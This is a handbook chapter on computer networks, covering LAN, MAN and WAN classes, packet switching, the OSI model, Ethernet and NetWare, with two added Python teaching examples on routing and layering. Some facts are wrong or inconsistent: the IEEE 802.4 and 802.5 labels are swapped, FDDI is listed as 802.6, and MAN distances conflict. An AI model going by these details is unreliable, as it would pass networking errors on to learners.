29 Computer Networks: LANs, MANs, WANs, and Wireless*

HURA GURDEEP 


INTRODUCTION 

The development and proliferation of Control Program for Microcomputers (CP/M)-based personal computers from the late 1970s and Microsoft Disk Operating System (DOS)-based personal computers in 1981 helped in creating a single site that may support a large number of computers. CP/M is also known as Control Program for Microprocessor or Monitor and became the first operating system for personal computers. DOS was written for x86 microprocessor-based PCs. The initial attraction of networking these machines was mainly to provide sharing of disk space and laser printers, which were both very expensive at the time. There was much enthusiasm for the concept, and for several years, from about 1983 onward, computer industry professionals would regularly declare the coming year to be “the year of the local area network (LAN).”

Computer networks that transmit data using digital signals are often an integral part of an organization's data acquisition, process control, or data analysis solution. A basic understanding of the network technologies available for various applications is required to make the best implementation decisions, as the decision can have a profound effect on the organization's ability to adapt to ever-changing technologies. For example, the type of network(s) or network products selected for a data acquisition application can greatly affect cost/benefit evaluations for future projects. Network technologies come in a bewildering array of options, and certain segments of this technology are changing at an incredible rate.

A well-designed, integrated solution for data transmission and transmission media, appropriate for the networks in use, will yield a competitive advantage to any industrial enterprise's computing and networking infrastructure. Users in all aspects of a business should be able to obtain organization and business data from any physical node, local or remote, using existing network products such as bridging, routing, and media conversion technologies that link local area, wide area, industrial, and enterprise networks together. With Internet and wireless technologies, data transmission over large geographic areas is increasingly feasible.


COMPUTER NETWORKS 

A computer network may be defined as a set of autonomous computers interconnected for the exchange of data. The connection may be provided by different transmission media, for example, wires, coaxial cables, fiber optics, microwaves, satellite links, lasers, etc. It encompasses both the transmission media and the communication software. A computer network can also be defined as a network architecture with associated protocols for different topologies and different access techniques, offering various applications. The various network activities are defined in terms of a hierarchy of layers, with each layer performing specific functions. Further, system architectures conforming to the standards should be able to communicate with each other. The network is used to provide connectivity, high reliability, a powerful communication medium, and cost savings through the sharing of expensive resources. Connectivity usually corresponds to providing users with access to information and processing power that are situated at a distance.

Packet-Switched Networks 

At an abstract level, a computer network can be considered as a system that deals with connectivity, end-to-end communication, packet delivery, and associated services between two computers/hosts connected by networks. The switching system used in packet-switched networks receives a data packet from the source node and looks for a free transmission link between itself and the next switching element that helps get the data packet to its destination. If it finds a free link, it will forward the data packet onto it; otherwise, it will store the data packet in its memory and try other routes for it. It will send the data packet to another switching element, which will again look for a free link, until the data are delivered to the destination. This is the store-and-forward concept.


* Specific information on wireless systems can be found in Chapter 16 and other chapters in this book. 




© 2012 by Bela Liptak 



Networks, Security, and Protection


The switching system has been variously named interface message processor (IMP), packet-switch node, intermediate system, and data exchange system (DES). The system provides an interface between hosts and communication systems and establishes a logical connection between hosts over transmission links. Packet switching is fast and appropriate for computer networks as it operates over many different types of networks. The forwarding of a data packet from one host to another represents a hop. Each host has routing information (containing a snapshot of the network topology) that it builds and updates by communicating with other hosts. The host uses this routing information in an attempt to choose the best route for sending the data packet toward its desired destination. There are usually many alternative routes to the destination, which enables the data packet to be routed around communication links or hosts that are out of service due to failure, attacks, or maintenance. The packet-switching concept used in all networks allows the network to be robust in the face of failure, attack, or maintenance. Some of the materials presented here have been derived from Refs. [1-3, 5, 7]. Reference [3] is the website of Microsoft Corporation, which has a link for Networking and Access Technology that provides information regarding its support for the widely adopted Institute of Electrical and Electronics Engineers (IEEE) 802.11 standards.
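As an added illustration of the store-and-forward behaviour described above (example code written for this edit, not from the chapter or its references), the toy subnet below joins IMPs by links that can be taken out of service. Each IMP forwards a stored packet one hop along the fewest-hop route over links that are currently up, or keeps it stored when no route exists; the IMP names, topology, and packets are constructed.

```python
from collections import deque


class Packet:
    """A data packet together with the IMPs it has visited so far."""

    def __init__(self, src, dst, payload):
        self.src, self.dst, self.payload = src, dst, payload
        self.path = [src]
        self.delivered = False


class SubNet:
    """IMPs joined by links that may be up or down. Each IMP keeps the
    packets it cannot forward yet in its store (store-and-forward)."""

    def __init__(self, links):
        self.up = {}
        self.stored = {}
        for a, b in links:
            self.up[(a, b)] = self.up[(b, a)] = True
            self.stored.setdefault(a, deque())
            self.stored.setdefault(b, deque())

    def set_link(self, a, b, is_up):
        """Take a link out of service (failure, attack, maintenance) or restore it."""
        self.up[(a, b)] = self.up[(b, a)] = is_up

    def neighbors(self, imp):
        return sorted(b for (a, b), ok in self.up.items() if a == imp and ok)

    def next_hop(self, imp, dst):
        """Breadth-first search over links currently up: the neighbour on a
        fewest-hop route to dst, or None if dst is unreachable right now."""
        parent = {imp: None}
        queue = deque([imp])
        while queue:
            cur = queue.popleft()
            if cur == dst:
                break
            for nb in self.neighbors(cur):
                if nb not in parent:
                    parent[nb] = cur
                    queue.append(nb)
        if dst not in parent:
            return None
        node = dst
        while parent[node] != imp:
            node = parent[node]
        return node

    def inject(self, pkt):
        """The source host hands the packet to its IMP."""
        self.stored[pkt.src].append(pkt)

    def run(self, max_rounds=50):
        """Let every IMP forward its stored packets one hop, round after round,
        until nothing moves: all delivered, or the rest wait for a link."""
        for _ in range(max_rounds):
            moved = False
            for imp in sorted(self.stored):
                for _ in range(len(self.stored[imp])):
                    pkt = self.stored[imp].popleft()
                    if imp == pkt.dst:
                        pkt.delivered = True
                        continue
                    nxt = self.next_hop(imp, pkt.dst)
                    if nxt is None:
                        self.stored[imp].append(pkt)  # no free route: keep it stored
                    else:
                        pkt.path.append(nxt)
                        self.stored[nxt].append(pkt)
                        moved = True
            if not moved:
                return


def demo():
    """Constructed five-IMP subnet: A-B-D is the short route from A to D,
    A-C-E-D the long one."""
    net = SubNet([("A", "B"), ("B", "D"), ("A", "C"), ("C", "E"), ("E", "D")])
    results = {}

    p1 = Packet("A", "D", b"all links up")
    net.inject(p1)
    net.run()
    results["normal"] = p1.path                        # ['A', 'B', 'D']

    net.set_link("B", "D", False)                      # B-D out of service
    p2 = Packet("A", "D", b"rerouted")
    net.inject(p2)
    net.run()
    results["rerouted"] = p2.path                      # ['A', 'C', 'E', 'D']

    net.set_link("E", "D", False)                      # D now unreachable
    p3 = Packet("A", "D", b"waits in store")
    net.inject(p3)
    net.run()
    results["stuck"] = (list(p3.path), p3.delivered)   # (['A'], False)

    net.set_link("B", "D", True)                       # link repaired
    net.run()                                          # stored packet now delivered
    results["after_repair"] = (p3.path, p3.delivered)  # (['A', 'B', 'D'], True)
    return results
```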

Configurations of Communication Services 

Each host is connected to one or sometimes more than one IMP. All of the data packets originating from a source host first arrive at one of these connected IMPs, from where they are delivered to the destination host through intermediate IMPs. The IMPs of a network may be connected by lines, cables, microwave links, satellite links, leased telephone lines, etc. All of these methods find applications in process control networks. Based on the topology of the subnet, three types of configuration of communication services (offered by IMPs to the users) can be implemented:

1. Point-to-point communications 

2. Multicast communications 

3. Broadcast communications 

Point-to-Point Communications 

In a point-to-point communication, the data packet from one host is transmitted over either a direct or an indirect link between the IMPs to which the hosts are connected. In a direct link, the IMPs are directly connected via a physical communication medium during transfer of the data packet. In an indirect link, the data packet is transferred over intermediate IMPs until it reaches the destination host's IMP; at each intermediate IMP, the data packet is stored and forwarded to the next available IMP, and this process is repeated until the data packet is received by the destination host. In this configuration, one of the main aims is always to minimize the number of hops between hosts. A hop defines a simple path of length one between two nodes, two hops define a simple path of length two, and so on.

Multicasting Communication 

In a multicasting communication, the data packet can be sent to the users of a selected group. There exists only one channel or circuit, which is shared by all connected hosts/IMPs of the selected group. This type of communication suffers from the problem of contention. The problem of contention can be resolved either by using a centralized dedicated processor, which decides which host can send data next, or by using a distributed system where each IMP resolves the problem independently. The latter obviously requires a complex protocol at each IMP.

Broadcasting Communication 

A more general form of multicasting communication is broadcasting communication, where a data packet is delivered to all hosts/IMPs connected to the network. The data packet is sent on the network circuit and is received by every host/IMP connected to it. If the address of a connected host/IMP matches the address contained in the data packet, that host/IMP copies it into its buffer.

CLASSES OF COMPUTER NETWORKS 

Networks are typically classified by the distance they span as local area networks (LANs), metropolitan area networks (MANs), and wide area networks (WANs). Some of the materials presented here have been derived from Ref. [2].

Local Area Network 

A LAN is a group of computers and associated devices that share a common communications medium, whether wired or wireless. LANs are computer networks ranging in size from a few computers in a single office to hundreds or even thousands of devices spread across several buildings. Typically, connected devices share the resources of a single processor or server within a small geographic area, for example, within a process environment. They function to link computers together and provide shared access to printers, file servers, and other services. Usually, the server holds applications and data storage that are shared in common by multiple computer users. A LAN may serve as few as two or three users or as many as thousands of users, for example, in fiber-distributed data interface (FDDI) networks.

LANs, defined for a small distance, usually in the range of 1-4, are privately owned networks within a single building or campus of up to a few miles in size. They are widely used to connect personal computers, laptops, personal digital assistants (PDAs), and other mobile devices, workstations, and peripheral devices in company offices, educational institutions, and factories for the exchange of information, files, and documents and for sharing resources such as printers, memory, etc. LANs are characterized by a number of technologies like network access technology, topology, broadcast communication, common channel, transmission media (wired or wireless) technology, physical size, layered model for architecture, and protocols. The protocols are the rules and encoding specifications for sending data. They also determine whether the network uses a peer-to-peer or client/server architecture.

LANs, in turn, may be plugged into larger networks, such 
as larger LANs or WANs, connecting many computers within 
an organization to each other and/or to the Internet. Because 
the technologies used to build LANs are extremely diverse, it 
is impossible to describe them except in the most general way. 
Universal components consist of the physical media that con- 
nect devices, interfaces on the individual devices that connect 
to the media, protocols that transmit data across the network, 
and software that negotiates, interprets, and administers the 
network and its services. Many LANs also include signal 
repeaters and bridges or routers, especially if they are large or 
connect to other networks. The level of management required 
to run a LAN depends on the type, configuration, and number 
of devices involved. In some cases it can be considerable. 

Metropolitan Area Network 

MANs are used for a distance of about 100 miles (within a metropolitan city area), while WANs cover distances of thousands of miles. The expensive resources that are shared among the users include information processing devices such as computers, printers, and file servers, and interconnection bandwidth. For each new application, appropriate servers are shared by users over the networks. Another example of sharing can be found in multimedia applications, where a multimedia server is shared by a number of users who access it over the networks.

Wide Area Network 

A WAN, or the Internet, is a telecommunications network that connects a geographically diverse group of computers within a state, country, or cities, or even across several states or countries. WANs typically are connected by telephone lines, other types of communication lines, or radio waves. A WAN is a computer network that covers a broad area whose communications links cross metropolitan, regional, or national boundaries. This is in contrast with PANs, LANs, campus area networks (CANs), or MANs, which are usually limited to a room, building, campus, or specific metropolitan area, respectively. WANs are also structurally similar to MANs, but they provide communications links for distances greater than 50 miles. A physical or logical WAN provides data communications to a larger number of independent users than are usually served by a LAN and is usually spread over a larger geographic area. The largest and most well-known example of a WAN is the Internet.


LOCAL AREA NETWORK STANDARDIZATION 

With different organizations defining their own LANs as standards, it was felt that these LANs had to be standardized by an appropriate international standards organization. IEEE formed a committee known as IEEE 802 with the goal of defining standards for all these LANs and also providing interoperability among them. Since each of the LANs was defined for a specific environment and application, their architectures were different. In order to avoid technical and integration problems, a standard for each of the LANs was defined and assigned a specific number by the IEEE 802 committee. The standards defined for each of the LANs were based on the Open System Interconnection-Reference Model (OSI-RM).

During the late 1980s, the U.S. Government OSI User Committee (USGOSIUC) was formed by the U.S. Government with the objective of providing OSI-related standards on the world market. The committee offers OSI requirements and specifications, and also coordinates with government agencies and industries working on OSI-based standards. All these organizations are working toward common objectives: to provide OSI-based standards, widespread development of products and protocols for OSI-RMs, and interoperability between various incompatible OSI-based products and LANs and non-OSI-based LANs. Standard LANs include IEEE 802.3 (Ethernet), IEEE 802.4 (token ring), IEEE 802.5 (token bus), and IEEE 802.6 (FDDI), and nonstandard LANs include IBM's Systems Network Architecture (SNA), DEC's DNA, and DECnet.

All these LANs proposed as individual standards are based on the OSI-RM in one way or another. For each of the LANs, the protocols are different for the different layers and are collectively known as a “set of protocols.” The only difference between the types of LANs lies in their lower layers, but these networks can still communicate with each other in the same way as two similar networks, via gateways, bridges, and routers. A protocol defines the rules, procedures, and conventions used for data communication between peer processes. It provides data formatting, various signal levels for data and control signals, error control, synchronization, and appropriate sequencing for the data to be exchanged.

LAN ARCHITECTURE: OPEN SYSTEM 
INTERCONNECTION-REFERENCE MODEL 

The International Standard Organization defined a reference 
model known as the OSI-RM for LANs. It does not define any 
services or protocols for OSI but instead provides a frame- 
work for coordinating the development of various standards 
for interconnecting different systems. According to OSI, a 
system is defined as a collection of computers with their asso- 
ciated software and attached peripheral devices so that the 
information can be transferred across its connected devices. 




FIG. 29.1

OSI reference model. (Layers from top to bottom, with the function shown beside each: Application (application programs), Presentation (data formatting), Session, Transport (addressing and segmentation), Network (routing), Data link (error control), Physical (encoding).)

The aim of the OSI-RM is to define a platform for different vendors that conforms to the reference model and associated standards, so that devices from different vendors can communicate with each other over the network. The OSI-RM architecture is defined in terms of seven layers, where each layer performs a specific function(s). Each layer further offers a set of services to the layer above it. The information processing required for any application requires an element known as an Application Process (AP). The implementation of each layer is shielded or hidden from its lower layer via an abstraction mechanism, and as such the implementation of the entire network is totally transparent to all users. Some of the materials presented here are derived from Book. For detailed discussions on these topics, please refer to Refs. [1,2,5].

The OSI-RM (Figure 29.1) consists of layers, and for each layer there is a specific set of functions and services. Each layer has its own element, known as an entity, which interacts with the entities of the layers below and above it. Peer entities are the entities at the same layer in two network systems following the OSI standard. For each of the layers, there is a set of rules and procedures, defined as the Layer Protocol.


The services offered by any layer through its entity to the layers above it are usually accessed at a Service Access Point (SAP), also called a socket or port. Figure 29.2 shows the SAP for the physical layer; similar SAPs exist for each of the layers above the physical layer and provide the interface between layers. When a user's request for a service is invoked at the highest layer, the data communication through the model takes the user's request all the way down to the lowest layer. Each layer adds its own control information and address to the message until it reaches the data link layer. This layer defines a frame by adding a header and trailer around the packet that it receives from the network layer.

On the receiving side, the frame travels from the lowest (physical) layer all the way up to the highest (application) layer, in the same way as on the transmitting side but in the reverse direction. Each layer removes its header and control information from the frame before passing it to the layer above. This process is termed Frame Reduction. The data flow in the OSI model is shown in Figure 29.3. The following section describes the functions, services, and standards of each of the protocol layers of the OSI-RM in brief, to give an idea of its total functionality and show the advantages of the layered approach for defining a model of computer networks and protocols. For details, readers are advised to refer to the many books on networks, such as Refs. [1,2,5,9,12].
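The header-adding walk down the stack and the frame reduction on the way back up, as an added toy example written for this edit (not code from the chapter; the one-byte layer tags, header layouts, and the CRC-32 trailer are constructed for illustration and do not follow any real protocol). Only the data link layer adds a trailer, and it is the layer that rejects a frame damaged on the medium.

```python
import struct
import zlib

# Each layer is a pair of functions: *_down() adds that layer's control
# information to the data handed down from the layer above; *_up() removes
# it again on the receiving side (the chapter's "frame reduction"). Header
# layouts and tag bytes are constructed for this example only.

class FrameError(Exception):
    """Raised by the data link layer when the trailer check fails."""

def presentation_down(text):
    # data formatting: both sides agree on ASCII as the character representation
    return b"\x06" + text.encode("ascii")

def presentation_up(pdu):
    assert pdu[0] == 0x06
    return pdu[1:].decode("ascii")

def session_down(sdu, session_id):
    return struct.pack("!BH", 0x05, session_id) + sdu

def session_up(pdu):
    tag, session_id = struct.unpack("!BH", pdu[:3])
    assert tag == 0x05
    return session_id, pdu[3:]

def transport_down(sdu, src_port, dst_port):
    # addressing of the application processes at either end
    return struct.pack("!BHH", 0x04, src_port, dst_port) + sdu

def transport_up(pdu):
    tag, src_port, dst_port = struct.unpack("!BHH", pdu[:5])
    assert tag == 0x04
    return (src_port, dst_port), pdu[5:]

def network_down(sdu, src_addr, dst_addr):
    # routing: source and destination host addresses
    return struct.pack("!BBB", 0x03, src_addr, dst_addr) + sdu

def network_up(pdu):
    tag, src_addr, dst_addr = struct.unpack("!BBB", pdu[:3])
    assert tag == 0x03
    return (src_addr, dst_addr), pdu[3:]

def datalink_down(packet, src_mac, dst_mac):
    # the only layer that also adds a trailer: CRC-32 over header + packet (error control)
    body = struct.pack("!BBB", 0x02, src_mac, dst_mac) + packet
    return body + struct.pack("!I", zlib.crc32(body))

def datalink_up(frame):
    body, trailer = frame[:-4], frame[-4:]
    if struct.unpack("!I", trailer)[0] != zlib.crc32(body):
        raise FrameError("CRC mismatch: frame damaged on the medium")
    tag, src_mac, dst_mac = struct.unpack("!BBB", body[:3])
    assert tag == 0x02
    return (src_mac, dst_mac), body[3:]

def physical_down(frame):
    # encoding: the frame becomes a bit string on the wire
    return "".join(f"{byte:08b}" for byte in frame)

def physical_up(bits):
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

def transmit(text, session_id=7, ports=(1000, 25), addrs=(10, 20), macs=(1, 2)):
    """Walk a user's request down the stack; returns the bits placed on the wire."""
    pdu = presentation_down(text)
    pdu = session_down(pdu, session_id)
    pdu = transport_down(pdu, *ports)
    pdu = network_down(pdu, *addrs)
    return physical_down(datalink_down(pdu, *macs))

def receive(bits):
    """Walk the frame back up, peeling one header per layer; returns the
    user data and the control information each layer recovered."""
    macs, packet = datalink_up(physical_up(bits))
    addrs, segment = network_up(packet)
    ports, spdu = transport_up(segment)
    session_id, ppdu = session_up(spdu)
    return presentation_up(ppdu), {"macs": macs, "addrs": addrs,
                                   "ports": ports, "session": session_id}

def flip_bit(bits, index):
    """Constructed noise on the medium: invert one bit of the wire signal."""
    return bits[:index] + ("1" if bits[index] == "0" else "0") + bits[index + 1:]

def frame_is_detected_as_damaged(bits):
    """True if the data link layer rejects the frame instead of passing it up."""
    try:
        receive(bits)
        return False
    except FrameError:
        return True
```

With a 5-character message the headers and trailer add 19 bytes, so 24 bytes (192 bits) go on the wire; flipping any single bit is caught by the data link layer before higher layers see the frame.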

Physical layer: The physical layer is mainly concerned with the electrical, mechanical, procedural, and functional aspects of transmission media for transmitting and receiving information over the network. It specifies the details of connecting cables, processing of digital signals, interfaces to different media, etc. The most popular standard of this layer for digital network interfaces is X.21 (CCITT). Other standards for this layer include V.24 (CCITT) and the RS-232 DCE/DTE interface (Electronics Industries Association, EIA).

Data link layer: The data link layer is responsible for maintaining the integrity of data between two hosts/sites. The protocols of this layer provide error recovery, error detection, and error correction to handle the errors caused by noisy media. Various standard protocols for the data link layer which provide a reliable channel and error recovery are IBM's BSC, Synchronous Data Link Control (SDLC), ISO's High-level Data Link Control (HDLC), and Link Access Protocol-Balanced (LAP-B), CCITT's version of HDLC.

FIG. 29.2

Communication link between physical layer entities. (Figure shows the service access point (SAP) between the two physical layer entities.)

FIG. 29.3

Dataflow through OSI reference model. (Figure shows the source and destination hosts connected through the communication subnet.)

Network layer: The network layer provides communication between the user's PC and public or private networks. It defines addressing and routing (the logical link) between source and destination sites. It also provides internetwork routing between two remote sites. X.25 is a standard for this layer, and proprietary networks providing an equivalent layer include IBM's SNA and DEC's DNA.

Transport layer: Transport layer offers network-independent 
service to higher layers and hides all details regarding the 
network being used for transmission. 

Session layer: The session layer provides a session for data 
communication between two applications processes. It also 
supports the synchronization between sites and defines check 
points from where diagnostic tests can be performed in the 
event of a failure. 

Presentation layer: The presentation layer represents the data 
information in appropriate form to be acceptable to the lower 
layers of the network. Two standard representation schemes 
for character representation are ASCII and EBCDIC and 
these are usually supported by most of the networks. All the 
application entities of the application layer are also translated 
or mapped into suitable entities by this layer. 

Application layer: The application layer provides an interface between application entities and the user's computer. This layer offers services for a variety of aspects of data communication between the user's computer and application entities, including terminal handling, file handling, text interchange, and job transfer and manipulation. For each of these aspects, a number of standards have been defined, and a collection of these standards is known as Specific Application Service Elements (SASE). Within each of these aspects of application, quite a number of standards have been defined and are still continuously being defined to cater to different upcoming applications from various technologies. For example, a large number of terminal handling standards have been defined, like basic class, form, graphics, images, etc. The data flow through OSI-reference.

Protocols: Interfacing in LAN Layer 

A protocol defines the rules, procedures, and conventions used for data communication between peer processes. It provides data formatting, various signal levels for data and control signals, error control, synchronization, and appropriate sequencing for the data to be exchanged. Two networks will offer two-way communication for any specific application(s) if they have the same protocols. Layer m is known as the service provider for layer m + 1 and offers its services at a SAP. The functions provided by a set of protocols in the OSI model are as follows:

• Establishes communication between users. 

• Provides sharing of computing and media resources 
via control and data packets and other facilities using 
multiplexing. The control packets are mainly to man- 
age the connection and ensure the correctness of data 
transfer across the network. 

• Supports serial communication, that is, multiple com- 
munication transfer over a single channel. 

• Supports point-to-point, multi-point connection, and 
broadcast configurations. 




• Supports leased-line (dedicated) and public-switched 
connections. 

• Supports orderly interleaving of control and data 
packets. 

• Provides error-free communication between users in 
the presence of inherent node errors introduced during 
the transmission. 

• Provides data integrity. 

As indicated above, the LAN covers a small physical area. 
ARCNET, Token Ring, and many other technologies have been 
used in the past, but Ethernet over twisted pair cabling, and 
Wi-Fi LANs are the two most common technologies currently 
in use. LANs in turn may be plugged into larger networks, 
such as larger LANs or WANs, connecting many computers 
within an organization to each other and/or to the Internet. 

Layered Protocol Configurations 

The different categories of configurations for layered proto- 
cols have been defined and discussed in the following: 

Point-to-point (non-switched): This configuration is defined 
by a dedicated line or a private leased line. The protocol for 
this configuration defines one node as a controller perform- 
ing various operations for data transfer across the line while 
other nodes interact with each other on the basis of point- 
to-point connection or communication. The configuration is 
based on star topology and as such this configuration is also 
known as star-type network. 

Point-to-point (switched): In this configuration, the connec- 
tion is established via dial-up operation. The protocol defines 
the procedures for connection establishment, data transfer, 
and connection de-establishment/termination phases. It uses 
a device known as automatic calling units (ACUs). Any sta- 
tion can make a request at any time and the protocol must 
resolve the contention problem. 

Multi-point (non-switched): This configuration is also 
known as multi-drop system. Here, a communication chan- 
nel is shared among users and all the users receive a message 
transmitted on the channel. Typically, one station controls all 
these operations and it also resolves the contention problem. 

Multi-point (switched): This configuration is different from 
multi-point (non-switched) in the sense that users have to 
make an initial request for sending a message. Different 
phases for sending messages across the channel are handled 
by appropriate protocols and sets of procedures. 

Figure 29.4 shows the step-by-step various processes that 
have been implemented in appropriate protocols that forward 
the packet from one network, say A, to another network, say B. 

LAN Topology and Connectivity 

LANs may use a number of transmission media like cable, fiber optics, twisted pairs of wires, and many others. Traditional LANs run at speeds of 10-100 Mbps, have low delay, and make very few errors. Newer LANs operate at up to 10 Gbps.

There are a number of topologies for LANs but out of 
those topologies, two topologies that support broadcast com- 
munication are bus and ring LANs. 

Bus LAN: All computers or peripheral devices are connected 
to a linear cable where only one connected computer can 
transmit the data over the bus as shown in Figure 29.5. A col- 
lision will occur if more than one computer tries to transmit 
simultaneously. The arbitration mechanism to avoid collision 
may be centralized or distributed. IEEE 802.3, popularly 
called Ethernet, for example, is a bus-based broadcast net- 
work with decentralized control, usually operating at 10 Mbps 
to 10 Gbps. Computers on an Ethernet can transmit whenever 
they want to; if two or more packets collide, each computer 
just waits for a random time period and tries again later. 

Ring LAN: In a ring LAN, a physical ring comprises repeaters, and each of the computers is connected to one repeater (Figure 29.6). One bit at a time passes through each repeater and propagates around the ring. Typically, each bit circumnavigates the entire ring in the time it takes to transmit a few bits, often before the complete packet has even been transmitted. IEEE 802.5 (the IBM token ring) is a ring-based LAN operating at 4-16 Mbps, and FDDI is another example of a ring network.

Typically, a suite of application programs can be kept on 
the LAN server. Users who need an application frequently 
can download it once and then run it from their local hard 
disk. Users can order printing and other services as needed 
through applications run on the LAN server. A user can share 
files with others at the LAN server; read and write access 
is maintained by a LAN administrator. A LAN server may 
also be used as a web server if safeguards are taken to secure 
internal applications and data from outside access. 

Loop system: This configuration uses a ring topology where 
the data is moving from one station to another over the ring 
(physical link). It requires nodes on the ring to include sets of 
protocols which resolve various issues during the data com- 
munication over the ring. This configuration may define both 
centralized and distributed categories of protocols. 

It is interesting to note that the IEEE 802 model of a LAN has eight layers instead of the seven defined by the OSI-RM. The data link layer of the OSI-RM is further partitioned into two sublayers, Logical Link Control (LLC) and Media Access Control (MAC), as shown in Table 29.1.

Ethernet is by far the most commonly used LAN technology. A number of corporations use the Token Ring technology. FDDI is sometimes used as a backbone LAN interconnecting Ethernet or Token Ring LANs. Another LAN technology, ARCNET, once the most commonly installed LAN technology, is still used in the industrial automation industry. The Ethernet LAN is considered the LAN of choice for many engineering graphics and high-demand applications and offers the following advantages: simplicity and reliability, low cost of installation, compatibility, ease of maintenance, support of interconnections between PCs and hosts, PCs and PCs, hosts and hosts, etc., use of approved LAN standards (ISO, IEEE, ECMA), support for backbone and broadband LANs, and others. A typical Ethernet diagram is shown in Figure 29.7.

FIG. 29.4

Flow of packet from one network to another network.

Ethernet is available in three versions: standard Ethernet, ThinNet, and twisted-pair Ethernet. Standard Ethernet and ThinNet are coaxial cable-based LANs, while twisted-pair Ethernet uses a hierarchical star topology with a concentrator bus configuration. Standard Ethernet is more expensive and harder to install than ThinNet, but it offers greater distance coverage for a large number of users. Twisted-pair Ethernet is based on the 10BASE-T specification, which allows the use of two pairs of existing drop cable wiring for LANs and is based on a star or hub topology. Other cable media are also supported in the standards documents: 10BASE2 uses thin-wire coaxial cable with a maximum segment length of 200 m, 10BASE5 uses thick-wire coaxial cable with a maximum segment length of 500 m, and 10BASE-F uses optical fiber drop cables and is based on a star topology (similar to 10BASE-T).

NetWare Operating System 

NetWare is a Network Operating System (NOS) that provides transparent remote file access and numerous other distributed network services, including printer sharing and support for various applications such as electronic mail (e-mail) transfer and database access. It specifies the upper five layers of the OSI reference model and as such runs on virtually any media-access protocol (Layer 2). Additionally, it also runs on virtually any kind of computer system, from PCs to mainframes. This chapter summarizes the principal communications protocols that support NetWare.

FIG. 29.5

Bus LAN. (Figure shows computers, a workstation, and a printer attached to a single bus.)

FIG. 29.6

Ring LAN.

TABLE 29.1

A Comparison of the OSI and IEEE 802 Models

OSI             IEEE 802 Model
Application     Application
Presentation    Presentation
Session         Session
Transport       Transport
Network         Network
Data link       LLC
                MAC
Physical        Physical


NetWare was developed by Novell, Inc., and introduced in the early 1980s. It was derived from Xerox Network Systems (XNS), which was created by Xerox Corporation in the late 1970s, and is based on the client-server architecture. Clients request services, such as file and printer access, from servers.

NetWare's client-server architecture supports remote access that is transparent to users through remote procedure calls. A remote procedure call begins when the local computer program running on the client sends a procedure call to the remote server. The server then executes the remote procedure call and returns the requested information to the local client. Figure 29.8 illustrates the NetWare protocol suite and the relationship between the NetWare protocols and the OSI reference model [1,2,5,11].

Internetwork Packet Exchange (IPX) is the original NetWare network-layer (Layer 3) protocol used to route packets through an internetwork. IPX is a connectionless datagram-based network protocol and, as such, is similar to the Internet Protocol found in Transmission Control Protocol/Internet Protocol (TCP/IP) networks.

METROPOLITAN AREA NETWORKS 

A MAN is a network for sharing regional resources that interconnects computing resources and LANs using backbone technologies in a geographic area or region larger than that covered by even large LANs but smaller than the area covered by a WAN. A MAN often provides efficient connections to a WAN. It is also used to interconnect several LANs by bridging them with backbone lines, thereby defining backbone networks.

Backbone networks connecting different LANs within a campus have become very common and useful for campus networks in most universities, big corporations, organizations, etc. Typically a MAN covers a distance of 20-50 miles and is generally owned by the organization, while the various communication links and equipment are generally owned by either a consortium of users or by Internet service providers. Examples of places where MANs have been used include England, Poland, New York, Geneva, Lodz, Switzerland, and many other metropolitan cities around the world. Based on the success of MANs and the advent of wireless technology, wireless MANs have been installed in a number of areas.

Some other technologies that have used MANs include Asynchronous Transfer Mode (ATM), Fiber Distributed Data Interface (FDDI), Distributed Queue Dual Bus (DQDB) defined in Institute of Electrical and Electronics Engineers IEEE 802.6, Ethernet at 10 Gbps (IEEE 802.3ae), Gigabit Ethernet at 1000 Mbps (IEEE 802.3z, 802.3ab), and Switched Multimegabit Data Service (SMDS). A MAN links with LANs at the physical layer using fiber-optic cables and wireless technologies such as microwave or radio. MAN protocols are mainly at the data link layer of the OSI model as defined by IEEE, the International Telecommunication Union (ITU-T), the Internet Engineering Task Force (IETF), and others.

FIG. 29.7 Typical Ethernet LAN: Department 1, Department 2, and Department 3 hosts on an Ethernet segment, a router-firewall, a department server and printers, and the link to the Internet.

FIG. 29.8 NetWare and OSI reference model. Application layers: NetWare core protocol (NCP), RPC-based application over RPC, LU 6.2 support, NetBIOS emulator, and NetWare shell (client); transport layer: SPX; network layer: IPX; data link and physical layers: Ethernet/IEEE 802.3, Token Ring/IEEE 802.5, FDDI, ARCnet, and PPP.

WIDE AREA NETWORKS 

WANs first emerged in the mid-twentieth century with the advent of networks like ARPAnet. Developed in 1969 by the Department of Defense, ARPAnet and several other networks eventually evolved into the Internet, the largest WAN in the world. The packet switching technology most commonly used with WANs surfaced in the 1960s, and a standard packet switching protocol, known as X.25, was developed in 1976. To increase network speed, packet switching allows for the parceling of data into smaller chunks, known as packets, prior to transmission. These packets can travel independently via alternate routes, and they are reassembled once they reach their target. Although X.25 remained the most popular WAN packet switching protocol for years, other packet switching protocols used with increasing frequency by WAN developers and administrators include the Internet standard, TCP/IP, and Frame Relay, used most often by WANs connected via high speed T1 and T3 lines.




Some WANs bring together various types of communications, such as data, video, and voice. Some organizations, including companies, universities, research centers, hospitals, and libraries, use WANs to connect to the Internet. The following section describes some of the popular applications of WANs.

WANs are often used by larger corporations or organizations to facilitate the exchange of information, and in a wide variety of industries corporations with facilities at multiple locations have embraced WANs. Increasingly, however, even small businesses are utilizing WANs as a way of increasing their communications capabilities. Many WANs are built for one particular organization and are private. They are commonly implemented in enterprise networking environments to link offices in different cities, states, countries, and even continents. WANs are also built by Internet service providers (ISPs) to provide connections from the LANs of their customers to the Internet.

The Internet, which is a world-wide network of interconnected computer networks, is a WAN, and thus it is the largest WAN in existence. A WAN consists of computers, networks, and other peripheral devices and runs a user's applications. These computers are usually known as hosts and are connected by communication subnets. Organizations or users may have their own hosts while the subnet is owned or operated by telephone companies or ISPs. The main responsibility of the subnet is to forward the message from the source host to another host until it reaches the destination host. The users of WANs do not own the transmission media that connect the remote hosts and subnets but can get services similar to those of a LAN through WAN service providers.

Applications of WANs 

The first application is found in most educational campuses. A typical WAN diagram for an education campus is shown in Figure 29.9. Other applications are found in most corporations. Some of the materials presented here have been derived from Refs. [1,2,8-10].

Reference [9] refers to a non-regulatory federal agency within the US Department of Commerce that provides technology, measurement, and standards for products ranging from automated teller machines and atomic clocks to mammograms and semiconductors, among innumerable other products and services. The reference refers to the material presented in the link "Computer security".


FIG. 29.9 Components of WAN.




WANs have been used in a number of applications, for example, centralized merchant transactions, remote application access (Citrix), remote user access, file transfer/sharing, video delivery, secure access to internal software applications, outsourced network management, compliance requirements, central data storage and backup, VoIP service, and others.

